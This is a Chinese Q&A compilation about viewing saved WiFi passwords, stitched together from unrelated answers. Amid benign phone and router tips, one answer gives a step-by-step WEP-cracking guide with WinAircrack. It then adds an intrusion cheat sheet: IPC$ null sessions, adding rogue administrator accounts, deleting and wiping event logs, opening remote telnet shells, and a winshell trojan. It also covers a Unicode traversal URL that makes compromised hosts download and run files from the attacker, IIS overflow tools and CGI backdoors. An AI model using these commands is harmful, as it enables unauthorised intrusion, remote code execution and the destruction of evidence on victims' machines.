有兩種方法:
1、初次登陸可以去路由查看
打開瀏覽器,地址欄輸入192.168.1.1,輸入用戶名和密碼登錄路由器後台。點擊無線設置即可看到。
2、已經登陸過查看方法
手機安裝wifi密碼查看器應用,找到自己的waln名,就可以看到對應的密碼。
Ⅱ 如何獲取本機存儲的無線網密碼 如果回答的答案正確追加分數!!!
需要WinAircrackPack
該工具包是一個無線工具的組合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airomp.exe四個程序,這些程序各有各的用。
SSID號發現工具就是airomp.exe。對付 SSID影藏
第一步:解壓縮下載的工具包,運行里頭的airomp.exe
第二步:選擇相應的網卡,輸入對應無線網卡前的序號
第三步:輸入o或者a選擇網卡模式,
第四步:選擇搜索頻段,輸入0是代表所有頻段都檢測的意思。
第五步:接下來會提示你輸入一個保存文件,這樣該工具會把所有sniffer下來的數據包放到這個文件中
第六步:only write wep ivs是否只檢測WEP加密數據包,我們選擇「Y」即可。
第七步:這時會出現一個提示,大概意思就是說目前驅動還不支持,無法進行sniffer的操作。同時瀏覽器會自動轉到一個頁面,我們可以通過這個頁面下載兼容驅動程序,升級我們的無線網卡讓sniffer工具——airomp.exe可以順利運行
(2)下載無線網卡新驅動:
要想下載合適的無線網卡新驅動就需要到前面提到的那個跳轉頁面了。
第一步:打開的頁面地址為http://www.wildpackets.com/support/proct_support/airopeek/hardware,我們通過這個地址下載適合自己網卡的可以使用airomp的驅動。
第二步:在搜索設備頁面中選擇自己無線網卡的品牌和型號。筆者選擇tp-link的所有無線產品進行查詢,看看應該下載哪個驅動
第三步:在查詢結果頁面中我們可以看到自己的網卡應該使用該站點提供的AR5005G驅動來使用airomp
四步:再次返回http://www.wildpackets.com/support/proct_support/airopeek/hardware頁面,你會在該頁內容上看到關於該驅動所兼容的atheros卡型號,裡面會提到ar5005,雖然我們的是ar5005g但是可以使用。點該頁面下方的the wildpackets atheros wireless driver v4.2鏈接進行下載即可
第五步:下載wildpackets atheros wireless driver v4.2驅動到本地硬碟。
第六步:打開後裡面有三個文件,我們的無線網卡升級工作就要靠這三個文件。
(3)安裝無線網卡新驅動:
之前下載的wildpackets atheros wireless driver v4.2壓縮包里的三個文件就是我們安裝驅動的主角。
第一步:在桌面網上鄰居圖標上點滑鼠右鍵,並選擇屬性。
第二步:在自己的無線網卡對應的本地連接上點滑鼠右鍵,並選擇屬性。
第三步:在無線網路連接屬性窗口中的「常規」標簽下點網卡信息旁邊的「配置」按鈕。
第四步:在「驅動程序」標簽中點「更新驅動程序」按鈕。
第五步:系統將出現硬體安裝向導,我們選擇「從列表或指定位置安裝(高級),然後點「下一步」按鈕
第六步:然後選擇「不要搜索,我要自己選擇要安裝的驅動程序」,點「下一步」按鈕繼續。
七步:由於之前我們安裝的驅動是*****無線網卡的官方驅動,所以系統默認會找到相應的驅動,我們不選擇他們,點「從磁碟安裝」。
第八步:通過「瀏覽」按鈕找到我們下載並解壓縮的wildpackets atheros wireless driver v4.2文件保存目錄。
第九步:選擇atheros ar5005g cardbus wireless network adapter,點「下一步」繼續
第十步:在安裝驅動過程中會出現兼容性提示,我們點「仍然繼續」即可。
第十一步:系統復制必須文件到本地磁碟
第十二步:完成硬體更新向導,我們的TP-LINK無線網卡現在已經變成了atheros ar5005g無線網卡了,這樣才能夠使用airomp這個無線網路sniffer工具。
四、總 結:
由於WEP破解的准備工作比較多,已經成功的將自己的網卡進行了更新驅動工作,這也是WEP加密破解的關鍵,
開始 輕松破解無線網路WEP
一、使用airomp抓取無線網路數據包並破解SSID名稱:
不管是找出已經禁用了SSID號廣播的無線網路還是進行WEP解密工作,我們首先要做的就是通過無線網路sniffer工具——airomp來監視無線網路中的數據包。
第一步:打開文章中下載的winaircrackpack壓縮包解壓縮的目錄。
第二步:運行airomp.exe程序,這個就是我們的sniffer小工具,他的正常運行是建立在我們無線網卡已經更新驅動的基礎上。
第三步:這時你會發現顯示的信息和安裝驅動前已經不同了,我們的***網卡名稱已經變為13 atheros ar5005g cardbus wireless network adapter,也就是說他成功更新為與atheros兼容的硬體了。我們輸入其前面的數字13即可。
第四步:接下來是選擇無線網卡的類型,既然說了是與atheros相兼容的,所以直接輸入「a」進行選擇即可。
第五步:上面文章中提到了已經把無線網路的SSID廣播功能取消了,這樣我們假設還不知道該無線設備使用的哪個頻段和SSID號。在這里輸入0,這樣將檢測所有頻段的無線數據包。
實際上要想知道一個無線網路使用的頻段是非常簡單的,可以使用無線網卡管理配置工具,就像上文提到的那樣,可以知道該無線網路使用的速度和頻段,但是無法檢測出SSID號。
第六步:同樣輸入一個保存數據包信息的文件,例如輸入softer。這樣可以把檢測到的數據包以及統計信息一起寫到這個文件中,並為使用其他工具提供基礎保證。
第七步:是否只收集wep數據信息,我們點N」。這樣將檢測網路中的所有數據包不只WEP加密數據。
第八步:最後airomp會自動檢測網路中的所有頻段,對無線網路中的無線數據包進行統計和分析。
第九步:當統計的數據包比較多的時候,就可以自動分析出無線網路對應的SSID號和無線設備的MAC地址以及無線速度,發射頻段和是否加密,採用何種方式加密了,是不是非常神氣?例如設置的無線網路SSID號為softer,剛開始圖7中統計時還沒有檢測出來,當數據達到一定數量後例如DATA處為 15651時就可以看到ESSID號即SSID號為softer了。
至此我們成功的實現了通過airomp找到沒有開啟SSID廣播功能的無線網路對應的SSID號,所以說僅僅報著將SSID號隱藏並修改默認名字是不能阻止非法入侵者連接無線網路的。不管你是否開啟SSID廣播,我們都可以通過無線網路的sniffer工具來找出你的真實SSID名稱。
不過有一點要特別注意,那就是是否能夠破解SSID名稱是建立在airomp搜集到足夠的數據包基礎上的,也就是說也可能你的無線路由器開著,但是沒有任何無線網卡和他通訊,這樣airomp是無法檢測到任何無線數據包並進行分析破解的。筆者在寫本文進行的實驗環境也是如此,那另外一塊TP-LINK無線網卡510G安裝在一台聯想筆記本上並不停的通過無線路由器進行BT下載來保持總是不斷有無線數據傳輸,這樣才可以加快破解進程。
另外當數據包沒有收集足夠多的情況下,airomp會出現錯誤信息,例如本來是WEP加密方式的無線網路,可能會檢測為WPA。用戶只需要多等些時間讓airomp收集足夠多的數據就可以保證顯示結果的真實性了。
二、使用WinAircrack破解WEP密文:
雖然我們可以通過airomp來檢測無線網路的基本信息,包括發射頻段,無線網路的SSID名稱,無線速度等。但是對於那些使用WEP加密了的無線網路就無能為力了,即使我們知道了無線網路的SSID號如果沒有WEP加密密文的話,依然無法連接到該網路。
不過airomp收集到的信息也是非常寶貴的,我們可以通過另外一個工具來分析出WEP密文。該工具的名稱是WinAircrack,當然在用 WinAircrack破解airomp收集到的信息前一定保證airomp收集的信息量要大,信息越多破解越不容易出問題,而且破解成功所需時間越短。
第一步:打開下載的壓縮包,運行裡面的winaircrack.exe程序。
第二步:在左邊找到general,接下來點GENERAL界面中下方的click here to locate capture file...,讓我們選擇一個捕獲文件。
第三步:這個文件就是上面所提到的airomp保存下來的數據統計文件,第九步中已經為其起了一個名字叫softer了,那麼我們到airomp.exe所在文件夾中找到softer.cap文件,這個文件就是捕獲文件。
第四步:回到general界面,在encryption type處選擇WEP。
第五步:在左邊點WEP,在WEP設置標簽中先檢測64位密文,key index保持自動AUTO。因為大部分用戶在設置無線路由器WEP加密時都選擇了最簡單的64位密文,他也是破解所需時間最短的。
第六步:設置完畢點右下角的「aircrack the key...」按鈕,winaircrack會自動根據softer.cap中保存的統計信息進行分析,暴力破解WEP密文。
第七步:由於採取的是暴力破解方法,所以花費的時間會比較多,大概需要幾個小時甚至更多的時間來破解一個64位的WEP密文。當發現WEP密文後會顯示出內容.
不過在實際操作過程中需要的時間會比較長,特別是當WEP密文設置的比較復雜時,例如使用多個數字或者增加加密位數達到128位等。
另外通過airomp來收集無線數據傳輸包也是關鍵,也許對方開著路由器但並沒有和網卡進行大流量數據傳輸,這樣即使你開啟airomp收集了幾個小時,都可能出現無法獲得足夠數據包問題。
僅僅是為了和大家交流,希望大家不要使用本文介紹的方法去入侵別人的無線網,
大家能夠明白WEP加密也不是百分之百安全,所以應該盡量使用WPA安全加密方式。
--------------------------------------------------------------------------------
無線網路密碼破解
面的工具可以幫助你。你有點電腦基礎的話,很容易搞到密碼的。
Kismet:一款超強的無線嗅探器
NetStumbler:免費的Windows 802.11嗅探器
GFI LANguard:一款Windows平台上的商業網路安全掃描器
Airsnort:802.11 WEP加密破解工具
無非是掃描 嗅探 破解
與遠程主機建立空管連接) net use \\IP地址\ipc$ "" /use:""
(以管理員身份登錄遠程主機) net use \\IP地址\ipc$ "密碼" /use:"Administrator"
(傳送文件到遠程主機WINNT目錄下) 本機目錄路徑\程序 \\IP地址\admin$
(查看遠程主機時間) net time \\IP地址
(定時啟動某個程序) at \\IP地址 02:18 readme.exe
(查看共享) net view \\IP地址
(查看netbios工作組列表) nbtstat -A IP地址
(將遠程主機C盤映射為自己的F盤) net use f: \\IP地址\c$ ""/user:"Administrator"
(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
net localgroup Administrators 用戶名 /add
(斷開連接) net use \\IP地址\ipc$ /delete
=====================================================
擦屁屁:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的「時間任務」服務:
netsvc /list \\IP地址
netsvc schele \\IP地址 /query
netsvc \\IP地址 schele /start
二、OpenTelnet.exe
遠程啟動主機的Telnet服務,並綁定埠到7878,例如:
OpenTelnet \\IP地址 用戶名 密碼 1 7878
然後就可以telnet到主機的7878埠,進入DOS方式下:
telnet IP地址 7878
三、winshell.exe
一個非常小的木馬(不到6K),telnet到主機的7878埠,輸入密碼winshell,當看到CMD>後,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (重新啟動機器)
d shutDown (關閉機器)
s Shell (執行後你就會看到可愛的「C:\>」)
x eXit (退出本次登錄會話,此命令並不終止winshell的運行)
CMD> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)
四、3389登陸器,GUI方式登錄遠程主機的
五、elsave.exe
事件日誌清除工具
elsave -s \\IP地址 -l "application" -C
elsave -s \\IP地址 -l "system" -C
elsave -s \\IP地址 -l "security" -C
執行後成功清除應用程序日誌,系統日誌,安全日誌
六、hbulot.exe
開啟win2kserver和winxp的3389服務
hbulot [/r]
使用/r表示安裝完成後自動重起目標使設置生效。
七、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出後的連接用。
想要連接到某處: nc [-options] hostname port[s] [ports] ...
綁定埠等待連接: nc -l -p port [-options] [hostname] [port]
參數:
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地埠號
-r 任意指定本地及遠程埠
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用於掃描時
八、TFTPD32.EXE
把自己的電腦臨時變為一台FTP伺服器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:\winnt\system32\文件名
然後可以直接令文件運行:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、 prihack.exe是IIS的printer遠程緩沖區溢出工具。idqover.exe是溢出idq的,選擇「溢出後在一個埠監聽」,然後用 telnet連接它的監聽埠,如果溢出成功,一連它的埠,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以後winxp 下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行許可權的目錄。然後用IE瀏覽器連接。
一、一 Xscan命令行運行參數說明:
在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據後提前退出程序,按""強行關閉程序。
1.命令格式: xscan -host [-] [其他選項]
xscan -file [其他選項]
其中 含義如下:
-port : 檢測常用服務的埠狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定製待檢測埠列表);
-ftp : 檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);
-ntpass : 檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);
-cgi : 檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);
-iis : 檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);
[其他選項] 含義如下:
-v: 顯示詳細掃描進度
-p: 跳過Ping不通的主機
-o: 跳過沒有檢測到開放埠的主機
-t : 指定最大並發線程數量和並發主機數量, 默認數量為100,10
採納我吧 謝謝
Ⅲ oppo r17手機怎麼查看已連接的無線網密碼
首先找到手機的「備份與恢復」,點擊進入之後再點擊「新建備份」。
02
備份有「個人數據」、「系統數據」和「應用程序」。我們不需要備份所有的,只用備份「系統數據」就可以了。
03
備份完成之後,找到手機的「文件管理」,點擊進入,然後點擊「所有文件」。
04
在所有文件里找到「backup」,這個就是備份文件,然後再找「Data」點擊進入,再去找「Setting」。
05
在Setting中找到含有「WiFi」字母的選項,接著點擊右上角的編輯,然後選擇含有「WiFi」字母的選項,選擇之後,點擊右下角的「高級」進行編輯。
06
把選項最後面的「tar」字母改成「txt」就行了。
07
改好之後,點擊這個選項就可以看文檔啦。
然後文檔內容比較亂,需要多往後面翻,看到連串的數字、字母或者數字字母混合體就是WiF
Ⅳ 如何查看自己電腦上連接的wifi密碼
查看電腦上連接的WIFI密碼的方法:
在電腦網路連接中查看密碼:點擊無線網路標識,然後會彈出網路連接的狀態框:
Ⅳ 如何查找自己的手機網路密碼
要查看自己的手機的網路密碼,先打開手機的設置往下滑動,進入個人熱點進去,就可以看到Wi-Fi密碼,當別人共享你的網路設置熱點時就輸入這個密碼,如果要更改密碼點擊密碼輸入自己的容易記住的密碼就可以了。
Ⅵ 怎麼查看手機共享wifi密碼
若使用的是vivo手機,進入手機設置--(其他網路與連接)--個人熱點--「熱點配置」即可查看或修改熱點密碼。
Ⅶ oppo手機怎麼查自己家的wifi密碼
OPPO手機查看wifi密碼方法:
1.首先在oppo手機的桌面上,找到手機的【備份與恢復】選項,並點擊進入。
2.進入到手機的備份與恢復界面後,在界面中找到【新建備份】選項,並點擊。
3.然後在備份界面中會出現【個人數據】、【系統數據】和【應用程序】的備份。這里,我們不需要備份所有的,只用備份【系統數據】就可以了,選擇系統數據,然後進行備份。
4.手機的系統數據備份完成之後,然後再手機的桌面上再找到【文件管理】選項,點擊進入。
5.進入到文件管理界面後,在界面中找到【所有文件】,並點擊進入。
6.進入到所有文件界面後,在文件中找到【backup】文件,也就是備份文件,然後點擊進入。
7.進入到backup文件中後,在文件中找到【Data】文件,然後點擊進入。
8.進入到Data文件中後,在文件中再找到【Setting】文件,並點擊進入。
9.進入到Setting文件中厚,在文件中找到含有「WiFi」字母的選項,然後點擊界面右上角的【編輯】選項,然後選擇含有「WiFi」字母的選項,接著再點擊界面右下角的【高級】進行編輯。
10.然後把選項最後的【tar】改成【txt】。
11.改好之後,再次點擊這個選項,就可以看文檔了。
12.進入到文檔界面後,文檔內容會比較的亂,這時需要我們多往後面翻,看到連串的數字、字母或者數字字母混合體就可以找到WiFi的密碼了
Ⅷ 直接顯示wifi密碼神器有哪些
目前只有破解wifi的軟體,並沒有可以直接查看密碼的wifi軟體。
WiFi萬能鑰匙是一款自動獲取周邊免費Wi-Fi熱點信息並建立連接的android手機必備工具。 所有的熱點信息基於雲端資料庫,內置全國數萬Wi-Fi熱點數據,隨時隨地輕松接入無線網路,最大化使用各種聯網的移動服務,尤其適合商務人群、移動人群和重度網蟲。
App安裝在手機上以後,不管用戶曾在哪裡連接過的任何無線熱點,配置文件都寫在手機上,而只要用戶手機安裝了這類軟體,網路連接的配置文件也就被上傳了。利用這些熱點數據,其他人可以隨時百隨地輕松接入無度線網路。
軟體功能:
雲端:基於雲端的Wi-Fi熱點資料庫,內置逾數十萬條的熱點數據,遍布全國各地。
省電:創新的Wi-Fi一鍵省電功能,屏幕鎖定或無網路傳輸狀態,智能關閉Wi-Fi功能,省電又省心。
分享:用戶可分享已知的Wi-Fi的熱點信息也可使用萬能鑰匙獲取其他用戶分享的熱點信息。
輕便:支持網頁認證一鍵連接,解除反復輸入的困擾。狀態欄圖標的顯示,方便跟蹤Wi-Fi熱點的信號與流量。